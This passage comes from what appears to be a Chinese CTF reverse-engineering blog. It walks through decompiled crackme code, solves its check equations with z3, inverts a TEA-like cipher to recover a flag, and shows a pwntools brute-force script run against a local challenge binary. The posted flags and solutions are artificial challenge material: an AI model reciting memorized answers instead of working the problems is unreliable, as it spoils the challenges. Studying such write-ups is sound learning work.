class="number">6</span>]; <span class="comment">// [rsp+40h] [rbp-30h] BYREF</span></span><br><span class="line"></span><br><span class="line"> v7[<span class="number">5</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line"> v6[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v6[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)((<span class="keyword">char</span> *)v6 + <span class="number">4</span> * i);</span><br><span class="line"> __isoc99_scanf(<span class="string">"%d"</span>, a2);</span><br><span class="line"> }</span><br><span class="line"> v7[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line"> v7[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">2</span>; ++j )</span><br><span class="line"> {</span><br><span class="line"> dword_601078 = v6[j];</span><br><span class="line"> dword_60107C = HIDWORD(v6[j]);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)&unk_601060;</span><br><span class="line"> change(&dword_601078, &unk_601060);</span><br><span class="line"> LODWORD(v7[j]) = dword_601078;</span><br><span class="line"> HIDWORD(v7[j]) = dword_60107C;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)check(v7, a2) != <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Do not forget to change input to hex and combine~\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>思路比较清晰,输入以后<code>change</code>函数处理,<code>check</code>函数比较,出结果。</p><p>我们先来看看<code>check</code>函数,美化:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> __int64 __fastcall <span class="title">check</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">signed</span> __int64 result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ( a1[<span class="number">2</span>] - a1[<span class="number">3</span>] != <span class="number">0x84A236FF</span>LL || a1[<span class="number">3</span>] + a1[<span class="number">4</span>] != <span class="number">0xFA6CB703</span>LL || a1[<span class="number">2</span>] - a1[<span class="number">4</span>] != <span class="number">0x42D731A8</span>LL )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line"> result = <span class="number">0LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> ( *a1 != <span class="number">0xDF48EF7E</span> || a1[<span class="number">5</span>] != <span class="number">0x84F30420</span> || a1[<span class="number">1</span>] != <span class="number">0x20CAACF4</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line"> result = <span class="number">0LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"good!"</span>);</span><br><span class="line"> result = <span class="number">1LL</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>根据提示,<code>z3</code>解方程:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line">s=Solver()</span><br><span class="line">x0 = Int(<span class="string">'x0'</span>)</span><br><span class="line">x1 = Int(<span class="string">'x1'</span>)</span><br><span class="line">x2 = Int(<span class="string">'x2'</span>)</span><br><span class="line">x3 = Int(<span class="string">'x3'</span>)</span><br><span class="line">x4 = Int(<span class="string">'x4'</span>)</span><br><span class="line">x5 = Int(<span class="string">'x5'</span>)</span><br><span class="line">s.add(x0==<span class="number">0xDF48EF7E</span>)</span><br><span class="line">s.add(x5==<span class="number">0x84F30420</span>)</span><br><span class="line">s.add(x1==<span class="number">0x20CAACF4</span>)</span><br><span class="line">s.add(x2-x3==<span class="number">0x84A236FF</span>)</span><br><span class="line">s.add(x3+x4==<span class="number">0xFA6CB703</span>)</span><br><span class="line">s.add(x2-x4==<span class="number">0x42D731A8</span>)</span><br><span class="line"><span class="keyword">if</span> s.check() == sat:</span><br><span class="line">m = s.model()</span><br><span class="line">print(m)</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">[x2 = 3774025685,</span></span><br><span class="line"><span class="string"> x3 = 1548802262,</span></span><br><span class="line"><span class="string"> x4 = 2652626477,</span></span><br><span class="line"><span class="string"> x1 = 550153460,</span></span><br><span class="line"><span class="string"> x5 = 2230518816,</span></span><br><span class="line"><span class="string"> x0 = 3746099070]</span></span><br><span class="line"><span class="string"> '''</span></span><br></pre></td></tr></table></figure><p>那么相当于知道了<code>flag_enc</code>,再看<code>change</code>函数:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">change</span><span class="params">(<span class="keyword">unsigned</span> <span class="keyword">int</span> *ini, _DWORD *tables)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 result; <span class="comment">// rax</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var; <span class="comment">// [rsp+1Ch] [rbp-24h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var_1; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line"> <span class="keyword">int</span> tmp; <span class="comment">// [rsp+24h] [rbp-1Ch]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> i; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line"> var = *ini;</span><br><span class="line"> var_1 = ini[<span class="number">1</span>];</span><br><span class="line"> tmp = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">63</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> tmp += <span class="number">0x458BCD42</span>;</span><br><span class="line"> var += (var_1 + tmp + <span class="number">11</span>) ^ ((var_1 << <span class="number">6</span>) + *tables) ^ ((var_1 >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line"> var_1 += (var + tmp + <span class="number">20</span>) ^ ((var << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var >> <span class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line"> }</span><br><span class="line"> *ini = var;</span><br><span class="line"> result = var_1;</span><br><span class="line"> ini[<span class="number">1</span>] = var_1;</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>对<code>change</code>函数的三行关键代码进行分析,发现<code>var_1</code>的处理只与此时<code>var</code>的值有关,其余都是常量;<code>var</code>的处理只与此时<code>var_1</code>值有关,其余都是常量。所以直接把加号变成减号就<code>ok</code>了。</p><p>然后还有一点需要注意的就是在<code>IDA</code>里面你的数据数据类型是什么,(你把鼠标移动到变量上面就会显示该变量的数据类型)你在写<code>exp</code>的时候数据就用什么数据类型,否则可能会出锅。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> flag_enc[<span class="number">5</span>],flag[<span class="number">5</span>];</span><br><span class="line">flag_enc[<span class="number">0</span>]=<span class="number">3746099070</span>;flag_enc[<span class="number">1</span>]=<span class="number">550153460</span>;flag_enc[<span class="number">2</span>]=<span class="number">3774025685</span>;flag_enc[<span class="number">3</span>]=<span class="number">1548802262</span>;flag_enc[<span class="number">4</span>]=<span class="number">2652626477</span>;flag_enc[<span class="number">5</span>]=<span class="number">2230518816</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> var[<span class="number">3</span>];</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> tables[<span class="number">4</span>]={<span class="number">2</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>};</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">5</span>;i+=<span class="number">2</span>){</span><br><span class="line"><span class="keyword">int</span> tmp = <span class="number">0x458BCD42</span>*<span class="number">64</span>;</span><br><span class="line">var[<span class="number">0</span>]=flag_enc[i];</span><br><span class="line">var[<span class="number">1</span>]=flag_enc[i+<span class="number">1</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;j<=<span class="number">0x3F</span>;j++){</span><br><span class="line">var[<span class="number">1</span>] -= (var[<span class="number">0</span>] + tmp + <span class="number">20</span>) ^ ((var[<span class="number">0</span>] << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var[<span class="number">0</span>] >> <span class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line">var[<span class="number">0</span>] -= (var[<span class="number">1</span>] + tmp + <span class="number">11</span>) ^ ((var[<span class="number">1</span>] << <span class="number">6</span>) + tables[<span class="number">0</span>]) ^ ((var[<span class="number">1</span>] >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line">tmp-=<span class="number">0x458BCD42</span>;</span><br><span class="line">}</span><br><span class="line">flag[i]=var[<span class="number">0</span>];</span><br><span class="line">flag[i+<span class="number">1</span>]=var[<span class="number">1</span>];</span><br><span class="line">}</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">6</span>;i++)</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"0x%x\n"</span>,flag[i]);</span><br><span class="line">}</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">0x666c61</span></span><br><span class="line"><span class="comment">0x677b72</span></span><br><span class="line"><span class="comment">0x655f69</span></span><br><span class="line"><span class="comment">0x735f67</span></span><br><span class="line"><span class="comment">0x726561</span></span><br><span class="line"><span class="comment">0x74217d</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>再用<code>sublime</code>处理一下,用<code>python</code>稍微跑一下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">flag=[<span class="number">0x66</span>,<span class="number">0x6c</span>,<span class="number">0x61</span>,<span class="number">0x67</span>,<span class="number">0x7b</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x5f</span>,<span class="number">0x69</span>,<span class="number">0x73</span>,<span class="number">0x5f</span>,<span class="number">0x67</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x61</span>,<span class="number">0x74</span>,<span class="number">0x21</span>,<span class="number">0x7d</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line">print(<span class="built_in">chr</span>(i),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment"># flag{re_is_great!}</span></span><br></pre></td></tr></table></figure><h2 id="一些奇奇怪怪的地方"><a href="#一些奇奇怪怪的地方" class="headerlink" title="一些奇奇怪怪的地方"></a>一些奇奇怪怪的地方</h2><p><code>main</code>函数:</p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231155258537.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231155258537.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201231155258537"></p><p>输入这个地方我嗯仔细分析一下,占位符<code>%d</code>对应整形<code>int</code>,也就是4个字节;<code>char</code>对应一个字节,也和<code>a2</code>那块的<code>4*i</code>相呼应了。综述这里的<code>v6</code>和<code>v7</code>应该都是整形数组,也就是32位,但<code>IDA</code>把他识别成了64位的。我们手动改一下:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line"> <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line"> __int32 v6[<span class="number">12</span>]; <span class="comment">// [rsp+10h] [rbp-60h] BYREF</span></span><br><span class="line"> __int32 v7[<span class="number">12</span>]; <span class="comment">// [rsp+40h] [rbp-30h] BYREF</span></span><br><span class="line"></span><br><span class="line"> *(_QWORD *)&v7[<span class="number">10</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line"> *(_QWORD *)v6 = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span class="number">6</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span class="number">8</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)&v6[i];</span><br><span class="line"> __isoc99_scanf(<span class="string">"%d"</span>, a2);</span><br><span class="line"> }</span><br><span class="line"> *(_QWORD *)v7 = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">6</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">8</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">4</span>; j += <span class="number">2</span> )</span><br><span class="line"> {</span><br><span class="line"> dword_601078 = v6[j];</span><br><span class="line"> dword_60107C = v6[j + <span class="number">1</span>];</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)&unk_601060;</span><br><span class="line"> change(&dword_601078, &unk_601060);</span><br><span class="line"> v7[j] = dword_601078;</span><br><span class="line"> v7[j + <span class="number">1</span>] = dword_60107C;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)check(v7, a2) != <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Do not forget to change input to hex and combine~\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>这样的话原本有点难理解的<code>LODWORD</code>和<code>HIDWORD</code>两个函数也就处理很好了。</p><p>这里还有一个问题:<img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160034433.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160034433.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201231160034433"></p><p>再分析<code>change</code>函数的时候,他的第二个参数是<code>unk_601060</code>,如果你直接扣<code>unk_601060</code>的话他是:<code>2,0,0,2,0,0,0,3,0,0,0,4,0,0,0</code></p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160436992.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160436992.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201231160436992"></p><p>但是明显他应该是<code>2,2,3,4</code>。这里我们要进一下<code>change</code>函数:</p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161751413.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161751413.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201231161751413"></p><p><code>change</code>函数里面的第二个参数声明是<code>_DWORD</code>,也就是4字节一单位,而<code>unk_601060</code>的单位是<code>byte</code>,所以我们要在<code>unk_601060</code>里面按一下<code>D</code>:</p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161951206.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161951206.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201231161951206"></p><p>这样就很舒服了~</p>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week7</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/</url>
<content type="html"><![CDATA[<h3 id="GUETCTF-2019-number-game"><a href="#GUETCTF-2019-number-game" class="headerlink" title="GUETCTF 2019 number game"></a><code>GUETCTF 2019 number game</code></h3><h4 id="爆破"><a href="#爆破" class="headerlink" title="爆破"></a>爆破</h4><p>看了一遍代码,不多,但逻辑感觉挺恶心的,所以我们要像神·<code>RX</code>学习,爆破!!!</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">vio</span>(<span class="params">tmp</span>):</span></span><br><span class="line">print(<span class="string">"test_"</span>,<span class="string">": try_"</span>,tmp)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./number_game"</span>)</span><br><span class="line">p.sendline(tmp)</span><br><span class="line">re = p.recv()</span><br><span class="line"><span class="keyword">if</span> <span class="string">b'T'</span> <span class="keyword">in</span> re:</span><br><span class="line">print(<span class="string">"ans: "</span>,tmp);</span><br><span class="line">os.system(<span class="string">'spd-say "Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh your program has finished"'</span>)</span><br><span class="line">a=<span class="built_in">input</span>()</span><br><span class="line">p.close()</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fuck</span>(<span class="params">cnt,tmp</span>):</span></span><br><span class="line"><span class="keyword">if</span> cnt==<span class="number">10</span>:</span><br><span class="line">vio(tmp)</span><br><span class="line"><span class="keyword">return</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>,<span class="number">53</span>):</span><br><span class="line">fuck(cnt+<span class="number">1</span>,tmp+<span class="built_in">chr</span>(i))</span><br><span class="line"></span><br><span class="line">fuck(<span class="number">0</span>,<span class="string">""</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里用<code>pwntools</code>与程序进行交互。这个爆破程序感觉有很多地方可以优化,例如多线程,但是多线程又不太会……所以只能手动修改代码来跑,同时运行多个,也算是多线程了……(逃</p><p>挖个坑吧,抽空学学多线程……</p><p>但是好像<code>pwntools</code>的效率比较低……</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> *</span><br><span class="line"> </span><br><span class="line"><span class="built_in">list</span> = <span class="string">'01234'</span></span><br><span class="line">j = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> product(<span class="built_in">list</span>, repeat=<span class="number">10</span>):</span><br><span class="line"><span class="built_in">input</span> = <span class="string">""</span>.join(i)</span><br><span class="line"></span><br><span class="line">obj = subprocess.Popen([<span class="string">"./number_game"</span>], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)</span><br><span class="line">obj.stdin.write(<span class="built_in">input</span>)</span><br><span class="line">obj.stdin.close()</span><br><span class="line">cmd_out = 